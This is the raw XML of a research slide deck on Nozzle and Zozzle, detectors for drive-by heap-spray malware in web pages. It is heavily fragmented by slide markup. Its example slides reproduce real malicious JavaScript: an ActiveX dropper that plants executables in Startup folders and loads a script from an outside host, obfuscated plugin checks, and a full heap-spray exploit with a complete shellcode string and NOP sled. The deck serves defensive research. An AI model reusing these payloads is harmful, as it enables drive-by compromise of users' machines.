3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v4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d1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d2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a;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i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r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while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(t[i] &amp;&amp; (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v1 ||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v2 ||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v3 ||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v4))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a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document.createElement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"object"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a.setAttribute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classid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clsid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:"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t[i])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a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d1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(a)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v1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f1(v1,a,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"ADODB.Stream"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v2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f1(v2,a,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"WScript.Shell"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v4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f1(v4,a,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"Scripting.FileSystemObject"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v3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f1(v3,a,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"Shell.Application"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i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++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(v1 || v4)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 err="1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var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d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b6(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ttt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());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s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"c:"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"Program"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g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"\\Uninstall.exe"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"\\Autostart"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j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"Start Menu\\"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q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"Startup"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(v2)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v2.Environment(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"PROCESS"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s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"HOMEDRIVE"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"TEMP"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m)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"TMP"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s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"c:"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k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"\\All Users\\"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c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s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"\\Documents and Settings"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k;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"Start"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p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"Menu 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x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Iniciar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d1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[c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"Menu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Inicio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"as\\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Inicio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Menuen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Start\\"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mer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p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"ma's\\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Opstarten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p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"y"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h,c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j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lar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\\BASLANGIC"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p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Avvio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"mi\\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Esecuzione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automatica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"-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meny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mer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\\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Oppstart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"-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menyn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h,s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"\\Dokumente und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Einstellungen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k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"menu\\"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"me"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h,c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p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x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b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"as\\"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x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g,c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j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"s\\"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q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g];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"iexplore.exe"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k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"..\\"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k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k;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p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n;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(v2)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f4(d1,v2.SpecialFolders(q)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f4(d1,v2.SpecialFolders(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AllUsers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q)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g)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d2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[s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"\\RECYCLER"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p,h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n,k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h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n,h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n,k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n,n,s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p];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(m)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f4(d2,m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p);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(v4)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f4(d2,v4.GetSpecialFolder(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2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p);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f2(v1,v4,d2,d);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f)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f2(v1,v4,d1,d);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n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(f)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(v3)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r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v3.ShellExecute(f)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r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!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r &amp;&amp; v2)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r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v2.Run(f,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1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try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    v2.Exec(f)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    r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0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(r)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document.write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"&lt;script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src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=http://rodenborn.com/images/validate.php?s=PTqrUdHv&amp;id=9&gt;&lt;/script&gt;"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else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if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(n)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   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=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f2(v1,v4,d1,d);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    </a:t>
            </a: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document.write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"&lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1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classid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='clsid:527196a4-b1a3-4647-931d-37ba5af23037' codebase='"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f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+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"'&gt;&lt;/object&gt;"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catch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(e)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{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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4040FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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 r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}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f3();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 err="1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document.write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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000060"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Consolas" pitchFamily="49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dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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 rot="16200000">
            <a:off x="-3009900" y="2857499"/>
            <a:ext cx="6858002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Zozzle detection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25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Zozzle: Detection on a Web Scale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017821"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1203960" y="1469136"/>
          <a:ext cx="6781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295400" y="5715000"/>
            <a:ext cx="6629400" cy="838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Thousands of malware sites daily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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-19050"/>
            <a:ext cx="334327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0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97872E-6 L -0.27743 2.97872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-3.9408E-6 L -0.27743 -3.9408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4" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic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800" y="1801201"/>
            <a:ext cx="7772400" cy="45233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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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navigator.userAgent.toLowerCase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indexOf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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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=x6.htm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navigator.userAgent.toLowerCase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indexOf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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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=x7.htm&gt;&lt;/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try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a;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ActiveXObject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"Sh"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"ockw"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"av"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"e"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Fl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+[…]);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 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finally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(a!=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"[object Error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]"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=svfl9.htm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try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c;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f=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ActiveXObject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"O"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"\x57\x43"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x31\x30\x2E\x53"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+[…]);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 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finally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(c!=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"[object Error]"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{ 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aacc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=of.htm&gt;&lt;/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setTimeout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aacc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)"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3500);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 }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5194494" y="3970401"/>
            <a:ext cx="3467974" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2286"/>
              <a:gd name="adj2" fmla="val -1256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"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37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</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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"msie 7"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-152400" y="2667000"/>
            <a:ext cx="5029200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24236"/>
              <a:gd name="adj2" fmla="val 1923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"O"+"\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x57\x43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"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et"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"OWC10.Spreadsheet"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Zozzle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990600" y="914400"/>
            <a:ext cx="3691128" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87601"/>
              <a:gd name="adj2" fmla="val 5155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"\x6D"+"\x73\x69\x65"+"\x20\x36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</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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"msie 6"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26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Next: Rozzle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72954" y="1801201"/>
            <a:ext cx="8185246" cy="5056799"/>
            <a:chOff x="272954" y="1801201"/>
            <a:chExt cx="8185246" cy="5056799"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="1801201"/>
              <a:ext cx="7772400" cy="4523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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/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navigator.userAgent.toLowerCase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().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indexOf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(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		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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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=x6.htm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navigator.userAgent.toLowerCase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().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indexOf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(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		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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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=x7.htm&gt;&lt;/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try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b="1" dirty="0" err="1" smtClean="0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a;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aa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=new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ActiveXObject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"Sh"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"ockw"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"av"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"e"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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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Fl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+[…]);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catch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{ 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finally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(a!=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"[object Error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]"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)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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1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=svfl9.htm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}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try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c;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f=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new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ActiveXObject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"O"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"\x57\x43"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x31\x30\x2E\x53"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+[…]);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catch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{ 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finally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(c!=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"[object Error]"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{ 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aacc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= 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=of.htm&gt;&lt;/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&gt;";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setTimeout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aacc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)", 3500);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} } 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5" name="Picture 2" descr="http://www.theplaceforitall.com/portablefirefox/images/firefox-log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8" b="22000"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="272954" y="5372100"/>
              <a:ext cx="1632045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-57150"/>
            <a:ext cx="3343275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Nozzle &amp; Zozzle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66800" y="3702320"/>
            <a:ext cx="2600325" cy="3079480"/>
            <a:chOff x="3124200" y="3476697"/>
            <a:chExt cx="2600325" cy="307948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476697"/>
              <a:ext cx="2600325" cy="279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352800" y="6248400"/>
              <a:ext cx="676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Nozzle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13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6545337"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1524000"/>
          <a:ext cx="8077200" cy="18135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81200"/>
                <a:gridCol w="3344736"/>
                <a:gridCol w="275126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Nozzle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Zozzle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 static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False</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> positives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 in a billion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 in a ¼ million or less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Reach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Finds 1,000s of malicious URLs for Bing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Goes beyond SafeBrowsing and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> AV detection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33400" y="2286000"/>
            <a:ext cx="8305800" cy="134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73063" y="5747266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http://research.microsoft.com/en-us/projects/nozzle/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5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1.2312E-6 L -1.11022E-16 0.057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Brief History of Memory-Based Exploits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143000" y="5029200"/>
            <a:ext cx="6781800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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47800" y="52255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1995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39070" y="3052693"/>
            <a:ext cx="287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Stack-based buffer overruns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4681257" y="1806935"/>
            <a:ext cx="652743" cy="3815333"/>
            <a:chOff x="3124200" y="1806935"/>
            <a:chExt cx="652743" cy="3815333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124200" y="525293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itchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2002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2019955" y="3052885"/>
              <a:ext cx="2861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Heap-based buffer overruns</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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05600" y="3320426"/>
            <a:ext cx="652743" cy="2301842"/>
            <a:chOff x="6705600" y="3320426"/>
            <a:chExt cx="652743" cy="2301842"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705600" y="525293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itchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2005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6363906" y="3803828"/>
              <a:ext cx="1336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Heap sprays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7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Heap Spraying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3000" y="1379220"/>
            <a:ext cx="6931822" cy="4572000"/>
            <a:chOff x="6781800" y="1828801"/>
            <a:chExt cx="6931822" cy="3767138"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6781800" y="1828801"/>
              <a:ext cx="6931822" cy="3767138"/>
              <a:chOff x="1676400" y="1905000"/>
              <a:chExt cx="6931822" cy="3767137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1905000"/>
                <a:ext cx="6931822" cy="3767137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495800" y="4114800"/>
                <a:ext cx="2209800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Firefox 3.5</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
                  <a:t>July 14, 2009</a:t>
                </a:r>
              </a:p>
              <a:p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8370466" y="2209800"/>
              <a:ext cx="42787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hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="21194946">
            <a:off x="2324866" y="1379220"/>
            <a:ext cx="5129448" cy="4572000"/>
            <a:chOff x="1676400" y="1447800"/>
            <a:chExt cx="5129448" cy="4525965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9653" t="16836" r="8039" b="7401"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1676400" y="1447800"/>
              <a:ext cx="5129448" cy="4525965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875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2133600" y="5181600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en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Adobe Acrobat / Reader </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>February 19, 2009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rot="323694">
            <a:off x="1752600" y="1204222"/>
            <a:ext cx="6223090" cy="4815572"/>
            <a:chOff x="228600" y="1371601"/>
            <a:chExt cx="6172200" cy="52622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1371601"/>
              <a:ext cx="6153150" cy="5125054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447800" y="6172200"/>
              <a:ext cx="495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hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>blog.fireeye.com/research/2009/07/actionscript_heap_spray.html</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 2" descr="save image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419998" y="3420986"/>
            <a:ext cx="457198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80" y="1143000"/>
            <a:ext cx="443462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Drive-By Attacks: How to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324600" y="1447800"/>
            <a:ext cx="2058339" cy="1656945"/>
            <a:chOff x="6324600" y="1447800"/>
            <a:chExt cx="2058339" cy="16569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447800"/>
              <a:ext cx="991541" cy="104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7999" y="1752600"/>
              <a:ext cx="991541" cy="104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91398" y="2057400"/>
              <a:ext cx="991541" cy="104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267200"/>
            <a:ext cx="1905000" cy="17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19200"/>
            <a:ext cx="1271835" cy="16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Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="3587493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2286000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Explosion 1 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="3276600" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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0wned!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9" y="17526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398" y="20574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267200"/>
            <a:ext cx="1905000" cy="17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1271835" cy="16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86000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="35874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05200" y="3657600"/>
            <a:ext cx="5334000" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAFDDB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&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1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&lt;SCRIPT language="text/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"&gt;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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr 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("%u4343%u4343%...'');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</a:br>
            <a:endParaRPr lang="en-US" sz="1400" b="1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&lt;IFRAME </a:t>
            </a:r>
            <a:r>
              <a:rPr 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SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC …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&amp;#3341;&amp;#3341;"&gt;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&lt;/IFRAME&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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04800" y="2133600"/>
            <a:ext cx="27432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09600" y="2286000"/>
            <a:ext cx="6096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00200" y="25908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66800" y="3200400"/>
            <a:ext cx="6096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Rounded Rectangular Callout 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="2743200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 872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Creates the malicious object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rounded Rectangular Callout 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="3886200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 872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Triggers the jump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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09600" y="1676400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Program Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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2286000" y="1219200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 872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ASLR  prevents  the attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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2286000" y="2895600"/>
            <a:ext cx="2286000" cy="1219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00400" y="2590800"/>
            <a:ext cx="5334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PC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>
            <a:stCxn id="24" idx="1"/>
            <a:endCxn id="50" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2209800" y="2781300"/>
            <a:ext cx="9906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3600" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Drive-By Heap Exploit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6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5834 -0.00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1667 0.03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19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25 -0.00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-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0" grpId="1" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="55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9" y="17526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398" y="20574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267200"/>
            <a:ext cx="1905000" cy="17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1271835" cy="16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86000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="35874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29000" y="3505200"/>
            <a:ext cx="5334000" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAFDDB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&lt;SCRIPT language="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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shellcode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("%u4343%u4343%...'');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oneblock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("%u0C0C%u0C0C");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oneblock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fullblock.length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&lt;0x40000) {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+=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}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sprayContainer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Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO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nn-NO" sz="14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nn-NO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nn-NO" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i=0; i&lt;1000; i++) {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sprayContainer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shellcode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}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800" y="2133600"/>
            <a:ext cx="27432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9600" y="2286000"/>
            <a:ext cx="6096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6800" y="3200400"/>
            <a:ext cx="6096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1676400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Program Heap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362200" y="23622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8800" y="32766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28194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47800" y="22098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62200" y="28194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638800" y="3886200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 872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Allocate 1,000s of malicious objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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3600" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Drive-By Heap Spraying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847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8" y="152400"/>
            <a:ext cx="86868000" cy="64008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html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 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body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&gt;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   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button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=’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butid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’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onclick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’trigger();’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style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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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display:none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/&gt;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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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script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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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err="1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shellcode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unescape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%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′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unescape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“%u0D0D%u0D0D”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headersize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=20;shellcodesize=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headersize+shellcode.length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A50021"/>
                </a:solidFill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bigblock.length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shellcodesize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){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+=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;}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heapshell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bigblock.substring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(0,shellcodesize);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bigblock.substring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(0,bigblock.length-shellcodesize);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nopsled.length+shellcodesize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&lt;0×25000){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nopsled+nopsled+heapshell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}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Spray</a:t>
            </a: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err="1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spray=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new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Array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();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(i=0;i&lt;500;i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++){spray[i]=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nopsled+shellcode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;}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Trigger</a:t>
            </a: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function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trigger(){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b="1" dirty="0" err="1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varbdy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document.createElement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(‘body’);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varbdy.addBehavior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(‘#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default#userData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’);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document.appendChild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varbdy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try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iter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=0;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iter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&lt;10;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iter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++) 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varbdy.setAttribute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s’,window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}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} </a:t>
            </a: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catch(e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){ }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window.status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+=”;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}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document.getElementById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butid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’).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onclick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/script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body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html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295400"/>
            <a:ext cx="86868000" cy="2286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err="1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shellcode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unescape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%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′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 rot="19800000">
            <a:off x="6172200" y="3043537"/>
            <a:ext cx="2209800" cy="156966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</a:rPr>
              <a:t>Typical heap spray attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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561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8442</TotalTime>
  <Words>4615</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>733</Paragraphs>
  <Slides>34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Finding Malware  on a Web Scale</vt:lpstr>
      <vt:lpstr>Blacklisting Malware in Search Results</vt:lpstr>
      <vt:lpstr>Drive-by Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>Brief History of Memory-Based Exploits</vt:lpstr>
      <vt:lpstr>Heap Spraying</vt:lpstr>
      <vt:lpstr>Drive-By Attacks: How to</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nozzle and Zozzle      Research to Reality in 18 Short Months</vt:lpstr>
      <vt:lpstr>Summary: Nozzle &amp; Zozzle</vt:lpstr>
      <vt:lpstr>Nozzle: Runtime Heap Spraying Detection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Local Malicious Object Detection</vt:lpstr>
      <vt:lpstr>Object Surface Area Calculation (1)</vt:lpstr>
      <vt:lpstr>Object Surface Area Calculation (2)</vt:lpstr>
      <vt:lpstr>Nozzle Global Heap Metric</vt:lpstr>
      <vt:lpstr>Nozzle Experimental Summary</vt:lpstr>
      <vt:lpstr>Zozzle: Static Malware Detection Plan</vt:lpstr>
      <vt:lpstr>Obfuscation</vt:lpstr>
      <vt:lpstr>Runtime Deobfuscation via Code Unfolding)</vt:lpstr>
      <vt:lpstr>Zozzle Training &amp; Application</vt:lpstr>
      <vt:lpstr>Hierarchical Feature Extraction</vt:lpstr>
      <vt:lpstr>Naïve Bayes Classification</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Features &amp; Throughput</vt:lpstr>
      <vt:lpstr>False Positives &amp; False Negatives</vt:lpstr>
      <vt:lpstr>Zozzle detection</vt:lpstr>
      <vt:lpstr>Zozzle: Detection on a Web Scale</vt:lpstr>
      <vt:lpstr>Limitations of Zozzle</vt:lpstr>
      <vt:lpstr>What’s Next: Rozzle</vt:lpstr>
